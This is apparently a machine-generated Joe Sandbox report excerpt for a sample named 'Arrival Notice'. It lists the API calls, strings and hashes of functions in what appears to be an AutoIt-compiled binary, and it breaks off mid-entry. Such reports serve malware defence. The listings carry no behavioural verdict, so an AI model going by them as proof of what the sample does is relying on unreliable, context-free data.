Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Cursor$Load
String ID:
API String ID: 1675784387-0
Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D

Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000E), ref: 00430913
SetTextColor.GDI32(?,00000000), ref: 0043091B
GetSysColor.USER32(00000012), ref: 00430933
SetTextColor.GDI32(?,?), ref: 0043093B
GetSysColorBrush.USER32(0000000F), ref: 0043094E
GetSysColor.USER32(0000000F), ref: 00430959
CreateSolidBrush.GDI32(?), ref: 00430962
GetSysColor.USER32(00000011), ref: 00430979
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
SelectObject.GDI32(?,00000000), ref: 0043099C
SetBkColor.GDI32(?,?), ref: 004309A6
SelectObject.GDI32(?,?), ref: 004309B4
InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
GetWindowLongW.USER32(?,000000F0), ref: 00430A09
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
DrawFocusRect.USER32(?,?), ref: 00430A91
GetSysColor.USER32(00000011), ref: 00430A9F
SetTextColor.GDI32(?,00000000), ref: 00430AA7
DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
SelectObject.GDI32(?,?), ref: 00430AD0
DeleteObject.GDI32(00000105), ref: 00430ADC
SelectObject.GDI32(?,?), ref: 00430AE3
DeleteObject.GDI32(?), ref: 00430AE9
SetTextColor.GDI32(?,?), ref: 00430AF0
SetBkColor.GDI32(?,?), ref: 00430AFB

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1582027408-0
Opcode ID: dff20096bd5e92af5fac991b491365de6cb937f55e2255b8c980abfa3172f9e0
Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
Opcode Fuzzy Hash: dff20096bd5e92af5fac991b491365de6cb937f55e2255b8c980abfa3172f9e0
Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8

Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A

Strings

REG_SZ, xrefs: 0046BC0D
REG_EXPAND_SZ, xrefs: 0046BBA5
REG_BINARY, xrefs: 0046BDFF
REG_MULTI_SZ, xrefs: 0046BC80
REG_DWORD, xrefs: 0046BD72
REG_QWORD, xrefs: 0046BDB6

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CloseConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 3217815495-966354055
Opcode ID: 8dcd1ae9babf70396529563c5406eb2540146bdbbecf2792358affe534d3a383
Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
Opcode Fuzzy Hash: 8dcd1ae9babf70396529563c5406eb2540146bdbbecf2792358affe534d3a383
Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9

Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004566AE
GetDesktopWindow.USER32 ref: 004566C3
GetWindowRect.USER32(00000000), ref: 004566CA
GetWindowLongW.USER32(?,000000F0), ref: 00456722
GetWindowLongW.USER32(?,000000F0), ref: 00456735
DestroyWindow.USER32(?), ref: 00456746
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
IsWindowVisible.USER32(?), ref: 0045682C
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
GetWindowRect.USER32(?,?), ref: 00456873
MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
CopyRect.USER32(?,?), ref: 004568BE
SendMessageW.USER32(?,00000412,00000000), ref: 00456914

Strings

,, xrefs: 0045666C
(, xrefs: 0045689F
tooltips_class32, xrefs: 0045678D

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
String ID: ($,$tooltips_class32
API String ID: 225202481-3320066284
Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58

Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 0046DCE7
IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
GetClipboardData.USER32(0000000D), ref: 0046DD01
CloseClipboard.USER32 ref: 0046DD0D
GlobalLock.KERNEL32(00000000), ref: 0046DD37
CloseClipboard.USER32 ref: 0046DD41
IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
GetClipboardData.USER32(00000001), ref: 0046DD8D
CloseClipboard.USER32 ref: 0046DD99

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
String ID:
API String ID: 15083398-0
Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A

Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

GetWindowRect.USER32(?,?), ref: 00471CF7
GetClientRect.USER32(?,?), ref: 00471D05
GetSystemMetrics.USER32(00000007), ref: 00471D0D
GetSystemMetrics.USER32(00000008), ref: 00471D20
GetSystemMetrics.USER32(00000004), ref: 00471D42
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
GetSystemMetrics.USER32(00000007), ref: 00471D79
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
GetSystemMetrics.USER32(00000008), ref: 00471DAB
GetSystemMetrics.USER32(00000004), ref: 00471DCF
SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
GetClientRect.USER32(?,?), ref: 00471E8A
GetStockObject.GDI32(00000011), ref: 00471EA6
SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9

Strings

AutoIt v3 GUI, xrefs: 00471E2F
@, xrefs: 00471C95

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
String ID: @$AutoIt v3 GUI
API String ID: 867697134-3359773793
Opcode ID: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
Opcode Fuzzy Hash: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58

Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00433A26
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00433A4E
_wcslen.LIBCMT ref: 00433A55
_wcscpy.LIBCMT ref: 00433A7B
_wcscat.LIBCMT ref: 00433A9C
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00433AC1
_wcscat.LIBCMT ref: 00433B0E
_wcscat.LIBCMT ref: 00433B15
__wcsicoll.LIBCMT ref: 00433B2F
_wcsncpy.LIBCMT ref: 00433B45

Strings

DefaultLangCodepage, xrefs: 00433B29
StringFileInfo\, xrefs: 00433A96
04090000, xrefs: 00433AFA
%u.%u.%u.%u, xrefs: 00433BAA
\VarFileInfo\Translation, xrefs: 00433ABB

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1503153545-1459072770
Opcode ID: 25176badb4c7c2acafbada8736ce4727ecc29bf237f3baecdcf6ce07152c7a72
Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
Opcode Fuzzy Hash: 25176badb4c7c2acafbada8736ce4727ecc29bf237f3baecdcf6ce07152c7a72
Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD

Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 004692C8
__wcsicoll.LIBCMT ref: 004692E0
__wcsnicmp.LIBCMT ref: 00469300

Strings

pQH, xrefs: 004693C6
[HANDLE:, xrefs: 0046930C
REGEXP=, xrefs: 00469323
ACTIVE, xrefs: 004692DA
[LAST, xrefs: 004693B9
[ACTIVE, xrefs: 004692EC
ALL, xrefs: 004693A0
[REGEXPTITLE:, xrefs: 00469335
LAST, xrefs: 004692C2
CLASSNAME=, xrefs: 0046934C
[CLASS:, xrefs: 0046935E
HANDLE=, xrefs: 004692FA
[ALL, xrefs: 004693B2

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __wcsicoll$__wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
API String ID: 790654849-32604322
Opcode ID: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
Opcode Fuzzy Hash: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE

Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51d54aaaf05eeae720ac6d1e318f43104c3f26f36b893052ab7eca2f1f05da39
Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
Opcode Fuzzy Hash: 51d54aaaf05eeae720ac6d1e318f43104c3f26f36b893052ab7eca2f1f05da39
Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795

Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD

Strings

0, xrefs: 004489F1

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window
String ID: 0
API String ID: 2353593579-4108050209
Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59

Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 0044A05E
GetClientRect.USER32(?,?), ref: 0044A0D1
SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
GetWindowDC.USER32(?), ref: 0044A0F6
GetPixel.GDI32(00000000,?,?), ref: 0044A108
ReleaseDC.USER32(?,?), ref: 0044A11B
GetSysColor.USER32(0000000F), ref: 0044A131
GetWindowLongW.USER32(?,000000F0), ref: 0044A140
GetSysColor.USER32(0000000F), ref: 0044A14F
GetSysColor.USER32(00000005), ref: 0044A15B
GetWindowDC.USER32(?), ref: 0044A1BE
GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
GetPixel.GDI32(00000000,?,?), ref: 0044A21D
ReleaseDC.USER32(?,00000000), ref: 0044A229
SetBkColor.GDI32(?,00000000), ref: 0044A24C
GetSysColor.USER32(00000008), ref: 0044A265
SetTextColor.GDI32(?,00000000), ref: 0044A270
SetBkMode.GDI32(?,00000001), ref: 0044A282
GetStockObject.GDI32(00000005), ref: 0044A28A

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
String ID:
API String ID: 1744303182-0
Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA

Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
__mtterm.LIBCMT ref: 00417C34

Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
__init_pointers.LIBCMT ref: 00417CE6
__calloc_crt.LIBCMT ref: 00417D54
GetCurrentThreadId.KERNEL32 ref: 00417D80

Strings

KERNEL32.DLL, xrefs: 00417C23
FlsSetValue, xrefs: 00417C59
FlsFree, xrefs: 00417C66
FlsAlloc, xrefs: 00417C44
FlsGetValue, xrefs: 00417C4C

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 4163708885-3819984048
Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C

Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 00434207
__wcsicoll.LIBCMT ref: 004342BB
LoadIconW.USER32(00000000,00007F04), ref: 004342D1

Strings

warning, xrefs: 0043426E
stop, xrefs: 0043424A
info, xrefs: 004342B5
question, xrefs: 00434226
blank, xrefs: 00434201

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __wcsicoll$IconLoad
